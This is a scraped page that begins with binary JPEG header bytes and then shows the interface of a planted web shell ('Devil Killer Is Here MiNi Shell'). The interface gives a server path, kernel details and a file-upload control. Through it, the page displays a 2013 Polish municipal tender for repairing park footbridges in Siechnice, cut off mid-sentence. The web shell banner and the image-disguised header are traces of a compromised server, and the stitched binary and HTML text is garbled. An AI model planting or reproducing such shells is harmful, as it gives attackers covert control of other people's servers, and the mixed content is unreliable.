JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130722/287034-N-2013.html

<p class="kh_header"><b>Siechnice: Remont kładek dla pieszych w parku w
Siechnicach</b><br>
<b>Numer ogłoszenia: 287034 - 2013; data zamieszczenia: 22.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont kładek dla pieszych w parku w
Siechnicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
realizacja zadania pn.: Remont kładek dla pieszych w parku w Siechnicach, w szczególności wykonanie
robót budowlanych polegających na usunięciu czterech istniejących przyczółków kładek dla pieszych a
następnie wykonanie czterech nowych przyczółków, a także wykonanie, dostawa i montaż dwóch kładek
dla pieszych wraz z uporządkowaniem terenu po wykonanych robotach. Przedmiot zamówienia obejmuje w
szczególności zakres szczegółowo opisany w dokumentacji technicznej stanowiącej załącznik nr 2 do
specyfikacji istotnych warunków zamówienia. Zamawiający informuje, że posiada następujące
opracowania: 1) Projekt budowlany niekompletny - Maćków Pracownia Projektowa Sp. z o.o., 2) Projekt
wykonawczy przyczółków - Fried-Pol Paweł Fried, 3) Plan Zagospodarowania Terenu, 4) Pomiar
geodezyjny stanu istniejącego - GeoFM Filip Zagził, 5) Badania gruntu - Zakład Usług Geotechnicznych
Geotest Piotr Bohdanowicz, 6) Przedmiar robót - Przedmiar ten stanowi jedynie informację o charakterze
pomocniczym, który wykonawca może wykorzystać wraz z informacjami zawartymi w dokumentacji
technicznej do opracowania własnego przedmiaru. Przedmiar wykonawcy będzie podstawą do ustalania
nakładów niezbędnych do wykonania robót stanowiących przedmiot zamówienia oraz oszacowania ceny oferty. 7) STWiORB, Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia zakresu zadania.
Zmiany będą dotyczyły tylko zakresu, który wyniknie w trakcie realizacji zadania, a będzie niezbędny do
właściwego zakończenia podstawowego zamówienia. Wykonawca będzie zobowiązany do naprawy
uszkodzeń powstałych przy wykonywaniu zamówienia. Tam, gdzie w SIWZ i dołączonych do niej
załącznikach (np. rysunki, specyfikacje techniczne wykonania i odbioru robót budowlanych, projekty,
przedmiary) zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca itp.) materiałów
lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający
dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie
parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach. Zamawiający
nie dopuszcza składania ofert częściowych. Oferty nie zawierające pełnego zakresu przedmiotu
zamówienia zostaną odrzucone.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówien uzupelniających w zakresie analogicznym do przedmiotu
zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.13-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisane oświadczenia o
spełnieniu warunków w niniejszym postępowaniu zgodnie z wzorem zamieszczonym w
załączniku nr 3 do specyfikacji istotnych warunków zamówienia - Oświadczenie o spełnieniu
warunków udziału w postępowaniu. W przypadku składania oferty przez wykonawców
ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone przez każdego wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisany wykaz wykonanych
w okresie pięciu lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, robót budowlanych. W wykazie wykonawca
zobowiązany jest do podania rodzaju, wartości, dat i miejsca wykonania wykazanych robót
budowlanych oraz załączy dowody dotyczące najważniejszych robót, określających, czy te
roboty zostały wykonane w sposób należyty, a także wskazujące, że zostały wykonane zgodnie z
zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi załącznik nr 7 do
specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/wykonywanych w ciągu
ostatnich pięciu lat robót budowlanych). Dowodami, o których mowa powyżej są: 1)
poświadczenie lub 2)jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie
jest w stanie uzyskać stosownego poświadczenia, oświadczenie wykonawcy. W przypadku, gdy
zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane w wykazie, o którym
mowa w pkt. 2, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania
dowodów, o których mowa niniejszym punkcie lub 3)dokumenty potwierdzające należyte
wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe
ukończenie, określone w § 1 ust. 1 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 30
grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od
wykonawców oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 226, poz 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek zostanie spełniony jeżeli wykonawca: 1)wykaże, że dysponuje lub będzie
dysponować w okresie przewidzianym na realizację zamówienia osobami, które będą
uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji
zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także
zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi
osobami, w szczególności osobami posiadającymi uprawnienia w rozumieniu ustawy Prawo
budowlane z dnia 7 lipca 1994 roku (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118 z późn.
zm.) oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów
budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.) lub odpowiadające im
ważne uprawnienia budowlane w zakresie pełnionej funkcji które zostały wydane na podstawie wcześniej obowiązujących przepisów, tj. osobą legitymującą się aktualnymi uprawnieniami do
kierowania robotami budowlanymi w specjalności mostowej lub drogowej lub konstrukcyjno-budowlanej, 2)wraz z ofertą
złoży podpisany wykaz osób, które będą uczestniczyć w realizacji zamówienia, zawierający
informację na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia zgodnie z
wymaganiami określonymi w pkt. 1, opracowany zgodnie z załączonym wzorem stanowiącym
załącznik nr 8 do specyfikacji istotnych warunków zamówienia - Wykaz personelu
odpowiedzialnego bezpośrednio za realizację zamówienia. 3)do oferty dołączy: a)informację o
podstawie do dysponowania osobą lub osobami, o których mowa w pkt. 1, b)zobowiązanie osoby
lub osób z uprawnieniami, że będą uczestniczyć w wykonywaniu zamówienia, c)oświadczenie,
że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane
uprawnienia, jeżeli ustawy nakładają obowiązek ich posiadania. UWAGA: Najpóźniej w dniu
podpisania umowy, Wykonawca którego oferta została wybrana, będzie zobowiązany dostarczyć
wszystkie niezbędne uprawnienia i aktualne zaświadczenia o przynależności do izby inżynierów
budownictwa, potrzebne do realizacji zadania zgodnie z przepisami. Zamawiający odstąpi od
podpisania Umowy, jeżeli Wykonawca najpóźniej w dniu podpisania umowy, nie dostarczy
wszystkich niezbędnych dokumentów, potrzebnych do realizacji zadania zgodnie z przepisami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca posiada ubezpieczenie prowadzonej działalności
gospodarczej w zakresie realizowanym w ramach niniejszej umowy. Na każde żądanie
Zamawiającego Wykonawca jest obowiązany okazać aktualną opłaconą polisę ubezpieczeniową
lub inny dokument potwierdzający posiadanie aktualnego ubezpieczenia. Ubezpieczenie musi
obejmować, co najmniej ubezpieczenie w pełnym zakresie od odpowiedzialności cywilnej w
związku z realizacją niniejszej umowy w wysokości, co najmniej wartości kontraktu. Zgodnie z
art.26 ust.2b ustawy Pzp, jeżeli Wykonawca w celu spełnienia warunku, o którym mowa powyżej,
polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi
stosunków, zamawiający w celu oceny, czy wykonawca będzie dysponował wskazanymi
zasobami w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy
stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów,
żąda przedstawienia dowodu posiadania aktualnej opłaconej polisy ubezpieczeniowej lub innego
dokumentu potwierdzającego posiadanie aktualnego ubezpieczenia przez podmiot, z którego
zasobów wykonawca korzysta.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawca
zobowiązany jest w wykazie, o którym mowa powyżej, wskazać roboty budowlane, których zakres
(charakter i złożoność) porównywalna jest z przedmiotem zamówienia, tj. powinien się wykazać
wykonaniem minimum jednego zamówienia polegającego na remoncie lub budowie lub
przebudowie fundamentów bezpośrednich poniżej zwierciadła wody gruntowej. Wykonawca zobowiązany jest do wskazania w ww.
wykazie robót budowlanych niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)oświadczenie o zapoznaniu się z terenem, zaakceptowaniu warunków przetargu oraz stawek i narzutów
do negocjacji wyceny robót dodatkowych i/lub uzupełniających - załącznik nr 5 do specyfikacji istotnych
warunków zamówienia. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o
udzielenie zamówienia, wymagane oświadczenie musi być złożone przez każdego wykonawcę w zakresie
w jakim jego dotyczy. 2)Wykonawca, ubiegający się o niniejsze zamówienie, który polega na wiedzy i
doświadczeniu, potencjale technicznym lub zdolności ekonomicznej i finansowej innych podmiotów,
niezależnie od charakteru prawnego łączących go z nim stosunków, zgodnie z art. 26 ust. 2b PZP,
zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do
oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu
zamówienia oraz żąda złożenia dokumentów dotyczących: a)zakresu dostępnych wykonawcy zasobów
innego podmiotu, b)sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy realizacji
zamówienia, c)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d)zakresu i okresu
udziału innego podmiotu przy wykonywaniu zamówienia. 3)jeżeli Wykonawca, wykazując spełnienie
warunków, o których mowa w art. 22 ust.1 ustawy Pzp, polega na zasobach innych podmiotów na
zasadach określonych w art. 26 ust. 2b Pzp, a podmioty te będą brały udział w realizacji zamówienia,
Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów
wymienionych w pkt 6.2 - 6.4 specyfikacji istotnych warunków zamówienia 4)listę podmiotów należących do
tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że Wykonawca nie
należy do grupy kapitałowej, których wzór stanowią odpowiednio załączniki nr 10 i nr 11 do specyfikacji
istotnych warunków zamówienia. 5)w przypadku oferty składanej przez Wykonawców wspólnie
ubiegających się o udzielenie zamówienia: a)oświadczenia wymienione w pkt. 6.1 i 6.2 specyfikacji
istotnych warunków zamówienia składane są przez wszystkich Wykonawców wspólnie ubiegających się o
udzielenie zamówienia. b)dokumenty wymienione w pkt 6.3 specyfikacji istotnych warunków zamówienia
składa każdy z Wykonawców. W przypadku prowadzenia działalności w formie spółki cywilnej i
przedłożenia do oferty zaświadczenia o wpisie do ewidencji działalności gospodarczej należy do tego
dokumentu dołączyć umowę spółki. Warunek nie ma zastosowania w przypadku załączenia do oferty
aktualnego odpisu z właściwego rejestru, jeżeli ujawniono w nim wspólników spółki, jak i sposób
reprezentowania spółki (składania oświadczeń woli). c)dokumenty wymienione w pkt 6.3, 6.4, 6.5, 6.6
specyfikacji istotnych warunków zamówienia muszą potwierdzać spełnienie warunków szczegółowych
łącznie przez Wykonawców składających wspólnie ofertę. 6)pełnomocnictwo dla podmiotów występujących
wspólnie (konsorcjum, spółka cywilna), jeżeli zaistnieje taka sytuacja, zgodnie z art. 23 ustawy Prawo
zamówień publicznych. W razie wyboru oferty podmiotów występujących wspólnie, Zamawiający zażąda
przed zawarciem umowy - stosownie do art. 23 ust. 4 - umowy regulującej współpracę tych podmiotów.
Oferta konsorcjum musi spełniać następujące wymagania - zawierać odrębne i niezależne dla każdego
uczestnika konsorcjum wszystkie dokumenty i oświadczenia wymienione powyżej, podpisana w taki
sposób, by zobowiązywała prawnie wszystkie strony - to znaczy podpisana przez przedstawiciela
konsorcjum, którego upoważnienie do złożenia oferty wynika z dołączonego pełnomocnictwa, udzielonego
przez upoważnionych przedstawicieli członków konsorcjum 7)pełnomocnictwo dla osoby podpisującej
ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba nie wykazana w rejestrze 8)
Zaakceptowane istotne postanowienia umowy - druki w załączeniu (Załącznik nr 6 do specyfikacji istotnych
warunków zamówienia - Istotne warunki umowy) 9)podpisany druk oświadczenia o zaakceptowaniu
warunków przetargu - druk w załączeniu (Załącznik nr 5 do specyfikacji istotnych warunków zamówienia -
Oświadczenie dotyczące elementów rozliczeniowych) W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone przez
każdego wykonawcę w zakresie w jakim jego dotyczy. 10) Wypełnionego druku oferty - zgodnie ze wzorem
stanowiącym załącznik nr 1 do SIWZ - wzór oferty Cena zawarta w ofercie musi uwzględniać wszystkie
prace wynikające z dokumentacji i z wizji w terenie. 11) Oświadczenie, że zastosowane przez Wykonawcę
przy realizacji zadania materiały będą posiadały właściwości użytkowe wymagane przy tego typu robotach,
a także będą posiadały ważne atesty, aprobaty techniczne i deklaracje zgodności dopuszczające do
stosowania, które na każde żądanie Zamawiającego zostaną niezwłocznie dostarczone - załącznik 12 do
specyfikacji istotnych warunków zamówienia W przypadku składania oferty przez wykonawców
ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie musi być złożone przez
każdego wykonawcę w zakresie w jakim jego dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza nieistotne zmiany w umowie oraz inne zmiany postanowień zawartych w istotnych
postanowieniach umowy, które Zamawiający przewidział w ogłoszeniu, specyfikacji istotnych warunków
zamówienia lub istotnych warunkach umowy, stanowiących załącznik nr 6 do specyfikacji istotnych
warunków umowy. 1. Zamawiający dopuszcza możliwość przerwania świadczenia prac nie z winy
Wykonawcy, których nie można było przewidzieć lub którym skutkom nie można było zapobiec, pomimo
dołożenia przez Wykonawcę najwyższej staranności (np.: klęska żywiołowa i inne). Zamawiający
dopuszcza zmianę terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od
Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w Umowie, termin ten może
ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności. 2.Zamawiający dopuszcza
zmianę przedstawicieli stron umowy. 3.Zamawiający dopuszcza zmianę osób wskazanych w ofercie
wykonawcy jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowego kierownika budowy,
w przypadku, gdy: 1)Wykonawca z własnej inicjatywy proponuje zmianę w następujących przypadkach: a)
śmierci, choroby lub innych zdarzeń losowych, b)nie wywiązywania się osób wskazanych w ofercie
wykonawcy z obowiązków wynikających z umowy, 2)jeżeli zmiana osób wskazanych w ofercie wykonawcy
stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji). 4.Zamawiający
może zażądać od wykonawcy zmiany osób wskazanych w ofercie wykonawcy, jeżeli uzna, że nie wykonują oni swoich obowiązków wynikających z umowy. Wykonawca zobowiązany jest zmienić osoby wskazane w
ofercie wykonawcy zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie.
5.W przypadku zmiany osób wskazanych w ofercie wykonawcy nowa osoba musi spełniać wymagania
określone w SIWZ dla danego specjalisty. 6.Zamawiający dopuszcza możliwość zmiany sposobu
rozliczania umowy lub dokonywania płatności. 7.Zamawiający dopuszcza możliwość zmiany stawki
podatku VAT w przypadku zmiany przepisów dotyczących podatku VAT. 8.Zamawiający zastrzega sobie
prawo zmniejszenia lub zwiększenia zakresu zadania. Zmiany będą dotyczyły tylko zakresu, który wyniknie
